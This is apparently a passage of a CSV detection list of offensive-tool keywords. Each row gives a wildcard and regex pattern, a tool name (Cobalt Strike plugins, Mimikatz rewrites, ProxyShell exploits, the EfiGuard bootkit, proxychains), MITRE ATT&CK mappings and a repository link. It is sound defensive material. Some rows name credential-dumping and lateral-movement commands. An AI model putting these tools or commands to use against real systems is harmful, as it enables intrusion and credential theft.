"*ProgIDsUACBypass.*",".{0,1000}ProgIDsUACBypass\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*program/replay.pl*",".{0,1000}program\/replay\.pl.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*projectb-temp/mimidogz*",".{0,1000}projectb\-temp\/mimidogz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" 
"*prosody2john.py*",".{0,1000}prosody2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Protocol/EfiGuard.h*",".{0,1000}Protocol\/EfiGuard\.h.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*Provided that the current user has the SeImpersonate privilege, this tool will have an escalation to SYSTEM*",".{0,1000}Provided\sthat\sthe\scurrent\suser\shas\sthe\sSeImpersonate\sprivilege,\sthis\stool\swill\shave\san\sescalation\sto\sSYSTEM.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*prowler gcp --credentials-file path*",".{0,1000}prowler\sgcp\s\-\-credentials\-file\spath.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Proxmark*",".{0,1000}Proxmark.{0,1000}","offensive_tool_keyword","Proxmark","The proxmark3 is a powerful 
general purpose RFID tool. the size of a deck of cards. designed to snoop. listen and emulate everything from Low Frequency (125kHz) to High Frequency (13.56MHz) tags.","T1210 - T1561 - T1336 - T1335","TA0002 - TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/Proxmark/proxmark3","1","1","N/A","N/A","10","3016","893","2024-02-03T13:32:36Z","2014-03-16T23:36:31Z" "*proxmark3 -p /dev/ttyACM0*",".{0,1000}proxmark3\s\-p\s\/dev\/ttyACM0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Proxy bypass enabled for Neo4j connection*",".{0,1000}Proxy\sbypass\senabled\sfor\sNeo4j\sconnection.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*Proxy Shellcode Handler*",".{0,1000}Proxy\sShellcode\sHandler.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","10","10","140","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*proxy.py --dns * --dns_port * --clients*",".{0,1000}proxy\.py\s\-\-dns\s.{0,1000}\s\-\-dns_port\s\s.{0,1000}\s\-\-clients.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","0","N/A","10","10","404","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*proxy_bypass.py*",".{0,1000}proxy_bypass\.py.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*proxy_cmd_for_exec_by_sibling*",".{0,1000}proxy_cmd_for_exec_by_sibling.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*proxy_linux_amd64*",".{0,1000}proxy_linux_amd64.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "*proxychains -*",".{0,1000}proxychains\s\-.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains atexec.py*",".{0,1000}proxychains\satexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*proxychains cme 
smb*",".{0,1000}proxychains\scme\ssmb.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains dcomexec.py*",".{0,1000}proxychains\sdcomexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*proxychains nmap -sT * -p * -Pn -A*",".{0,1000}proxychains\snmap\s\-sT\s.{0,1000}\s\-p\s.{0,1000}\s\-Pn\s\-A.{0,1000}","offensive_tool_keyword","ligolo","proxychains used with ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*proxychains nmap*",".{0,1000}proxychains\snmap.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains 
psexec.py*",".{0,1000}proxychains\spsexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*proxychains rdesktop *",".{0,1000}proxychains\srdesktop\s.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*proxychains secretsdump*",".{0,1000}proxychains\ssecretsdump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*proxychains smbclient -L *",".{0,1000}proxychains\ssmbclient\s\-L\s.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains smbexec.py*",".{0,1000}proxychains\ssmbexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven 
hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*proxychains telnet*",".{0,1000}proxychains\stelnet.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains wmiexec.py*",".{0,1000}proxychains\swmiexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*proxychains*scshell*",".{0,1000}proxychains.{0,1000}scshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 
- T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*proxychains.conf*",".{0,1000}proxychains\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains.lsm*",".{0,1000}proxychains\.lsm.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains.sourceforge.net*",".{0,1000}proxychains\.sourceforge\.net.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" 
"*proxychains.sourceforge.net*",".{0,1000}proxychains\.sourceforge\.net.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains-master*",".{0,1000}proxychains\-master.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains-other.conf*",".{0,1000}proxychains\-other\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*ProxyCommand=nc -lp 8080 -s 127.0.0.1*",".{0,1000}ProxyCommand\=nc\s\-lp\s8080\s\-s\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*Proxy-DLL-Loads*",".{0,1000}Proxy\-DLL\-Loads.{0,1000}","offensive_tool_keyword","bruteratel","A 
Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*proxyDllLoads.c*",".{0,1000}proxyDllLoads\.c.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*proxyDllLoads.exe*",".{0,1000}proxyDllLoads\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*proxyLogon.py*",".{0,1000}proxyLogon\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation 
tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/RickGeex/ProxyLogon","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*proxyresolv *",".{0,1000}proxyresolv\s.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxyshell.py*",".{0,1000}proxyshell\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*proxyshell_rce.py*",".{0,1000}proxyshell_rce\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*proxyshellcodeurl*",".{0,1000}proxyshellcodeurl.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","140","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*proxyshell-enumerate.py*",".{0,1000}proxyshell\-enumerate\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*proxyshell-poc*",".{0,1000}proxyshell\-poc.{0,1000}","offensive_tool_keyword","Earth Lusca 
Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ps_token2john.py*",".{0,1000}ps_token2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ps_wmi_exec.rb*",".{0,1000}ps_wmi_exec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ps2exe -*",".{0,1000}ps2exe\s\-.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*ps2exe *.ps1*.exe*",".{0,1000}ps2exe\s.{0,1000}\.ps1.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*ps2exe.ps1*",".{0,1000}ps2exe\.ps1.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*ps2exe.psd1*",".{0,1000}ps2exe\.psd1.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*ps2exe.psm1*",".{0,1000}ps2exe\.psm1.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to 
